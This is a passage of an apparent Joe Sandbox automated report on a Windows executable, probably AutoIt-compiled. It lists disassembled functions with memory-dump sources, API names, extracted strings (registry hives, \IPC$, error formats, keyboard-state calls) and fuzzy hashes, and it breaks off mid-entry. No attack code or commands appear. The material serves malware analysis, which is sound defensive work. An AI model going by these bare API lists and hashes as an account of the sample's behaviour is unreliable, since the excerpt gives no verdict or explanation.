                                                                                          Function 00007FF74D09B0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                          • String ID: NULL Pointer assignment
                                                                                          • API String ID: 2706829360-2785691316
                                                                                          • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                          • Instruction ID: 92a886e36d51655e484258030dc3be79303677b0d56056b510aaee0af5738a53
                                                                                          • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                          • Instruction Fuzzy Hash: A9515E32A1DA16CAEB40FF65D8897BCA371FB84B88F804431DA4E57665EF38D045C320
                                                                                          Function 00007FF74D0D1110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF74D0CFD7B), ref: 00007FF74D0D1143
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharUpper
                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                          • API String ID: 3964851224-909552448
                                                                                          • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                          • Instruction ID: a5ddd5d3974fd5085eb0f5de3ded27b4c74057c696a749926839b0121d4ac95a
                                                                                          • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                          • Instruction Fuzzy Hash: 28E19212F0CA57C1EA60BB65D8602B9A3E0BF10B94FC54532D9AD477E8FE3CE9558321
                                                                                          Function 00007FF74D0B87CC Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                                          • String ID: *.*
                                                                                          • API String ID: 4125642244-438819550
                                                                                          • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                          • Instruction ID: 25933dbdb275490fc4d60a5916375f1b23951372954b5ebe137db1ca0ca99a37
                                                                                          • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                          • Instruction Fuzzy Hash: 14816022A1CA86C6EB20FF55D8547BDA3A0FB44B84FC44036DA8E476B5EF78D545C720
                                                                                          Function 00007FF74D0AA40C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                          • String ID: P
                                                                                          • API String ID: 1460738036-3110715001
                                                                                          • Opcode ID: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                                                          • Instruction ID: 763888fa61262cab21d73ef29b20132c019189ab70a64243177701af49e8a63e
                                                                                          • Opcode Fuzzy Hash: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                                                          • Instruction Fuzzy Hash: 1771D222A0C682CAE761FF2494442BEA7A1BB94748F944435DACE077E5EE7CE546C730
                                                                                          Function 00007FF74D0B3268 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadStringwprintf
                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                          • API String ID: 3297454147-3080491070
                                                                                          • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                          • Instruction ID: d5eda1532d97d2f68e406dc86a8b97e55dda0260d07768acabd61d5c690e674b
                                                                                          • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                          • Instruction Fuzzy Hash: 04617322B1CA42D6EB00FB64E4446FDA361FB94744FD05032EA8D17AA9EF7CE506C760
                                                                                          Function 00007FF74D0A74B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                          • API String ID: 4051287042-2268648507
                                                                                          • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                          • Instruction ID: a4756297a0ef6bfaed7d67b7f720953606569c32251c16f228cb5801f1795d62
                                                                                          • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                          • Instruction Fuzzy Hash: 7A518322B1CA46D2EB00FB64E8455EDA321FF94744FC04532E98D576AAEFBCD506C760
                                                                                          Function 00007FF74D0AD4AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 65sleepwindowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                          • String ID: BUTTON
                                                                                          • API String ID: 3935177441-3405671355
                                                                                          • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                          • Instruction ID: f42464c5bf23da0eedf3ca4f77c8812d5abcfdd7ea3409500bc3dcced73f227c
                                                                                          • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                          • Instruction Fuzzy Hash: B6313825E0D64BC2F710BB20F85877AA361AF99744FC54831D98E076B1FEBDE4888631
                                                                                          Function 00007FF74D0315EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1974058525-0
                                                                                          • Opcode ID: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                                                          • Instruction ID: 82d7517ce7bd3148e769bd8ea5122336fb2d680f67b20ab06289831ef765e3b8
                                                                                          • Opcode Fuzzy Hash: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                                                          • Instruction Fuzzy Hash: C1917A21A0EA0AC2EB54BF51A594278A3A0AF88B84FD84535DD8E4B764FF7CE4508761
                                                                                          Function 00007FF74D0A2F78 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                          • String ID:
                                                                                          • API String ID: 3096461208-0
                                                                                          • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                                          • Instruction ID: c226ab9471d33585d737ab0e391e4ad04a105c95ce25ecf0af061c3a99cb1dcd
                                                                                          • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                                          • Instruction Fuzzy Hash: 0F61A272B0C240CBE718DF69E45866CB7A2B788B84F508539DE4993F58EF3CD9058B10
                                                                                          Function 00007FF74D0A7E64 Relevance: 18.2, APIs: 12, Instructions: 173keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: State$Async$Keyboard
                                                                                          • String ID:
                                                                                          • API String ID: 541375521-0
                                                                                          • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                          • Instruction ID: fd7cf7ed8d24647d294d209f3f1aa2bf1bd71c8f78f55bf08b9c715bc8972007
                                                                                          • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                          • Instruction Fuzzy Hash: 5571E312A0C6C2C5FB74BB3090102B9AB61EFA9B88FD84039D6CD033A2EE5DD945C771
                                                                                          Function 00007FF74D0B4708 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 339COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharDriveLowerTypewcscpy
                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                          • API String ID: 1561581874-1000479233
                                                                                          • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                                          • Instruction ID: 1f7c7c8a74b3bc3accd020eee199ba098a25e962d369bc007e0cce5d27e86bef
                                                                                          • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                                          • Instruction Fuzzy Hash: 03D1A322E0CA56C1EB20BB5595402B9E3A1FB54B98F904231DADD53BB4FF7CEA458720
                                                                                          Function 00007FF74D09FF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                          • String ID: %s%u
                                                                                          • API String ID: 1412819556-679674701
                                                                                          • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                          • Instruction ID: 7e9408f2a6098aaa960bc0a82895b67bb88c9ba3a0dc948d711c5845ef67141b
                                                                                          • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                          • Instruction Fuzzy Hash: 71B1D572B0C68AD6EB28FB25D8046F8A761FB55B84FC00031CE89477A9EF39E555C720
                                                                                          Function 00007FF74D0A176C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 226COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                          • String ID: ThumbnailClass
                                                                                          • API String ID: 4010642439-1241985126
                                                                                          • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                          • Instruction ID: f448189b736d8d174640448934b29099f1fe7b7e38c2e714902493e5282aa169
                                                                                          • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                          • Instruction Fuzzy Hash: 37A1B822B0C546C3EA24BF15E4446B9E7A1FBA5784F804035CACE07BA5EE7DE905CB21
                                                                                          Function 00007FF74D031504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                          • String ID: P
                                                                                          • API String ID: 1268354404-3110715001
                                                                                          • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                          • Instruction ID: 0735b1533e4c64dcf1b757eea2646f88f291cb32026b315b32a1f4e2f159aa8b
                                                                                          • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                          • Instruction Fuzzy Hash: 4961C235B0D742CAEB14FF25E840679A7A0BB88B98F900535ED8E43BA4EF7CE4408750
                                                                                          Function 00007FF74D0B34E4 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadStringwprintf
                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                          • API String ID: 3297454147-2391861430
                                                                                          • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                          • Instruction ID: 69bd1b7e0434f31545f88000f47cca89362ea17a7fff8994f6ac75cc4e8cc93d
                                                                                          • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                          • Instruction Fuzzy Hash: 44716F22B2CA52D6EB10FB65E5405FDA320FB84744FD05132EA8D17AA9FE7CE506CB50
                                                                                          Function 00007FF74D09C034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124registryshareCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                          • API String ID: 3030280669-22481851
                                                                                          • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                          • Instruction ID: ed9e503dc108b4a62ff4e604920574dbfb38ea83d637e9135415c2e2ab7b4441
                                                                                          • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                          • Instruction Fuzzy Hash: C451A622A1CA82D6EB10FB65E8946EDA761FB84384FC00031EA8D47A79FF7CD585C710
                                                                                          Function 00007FF74D0DAD1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
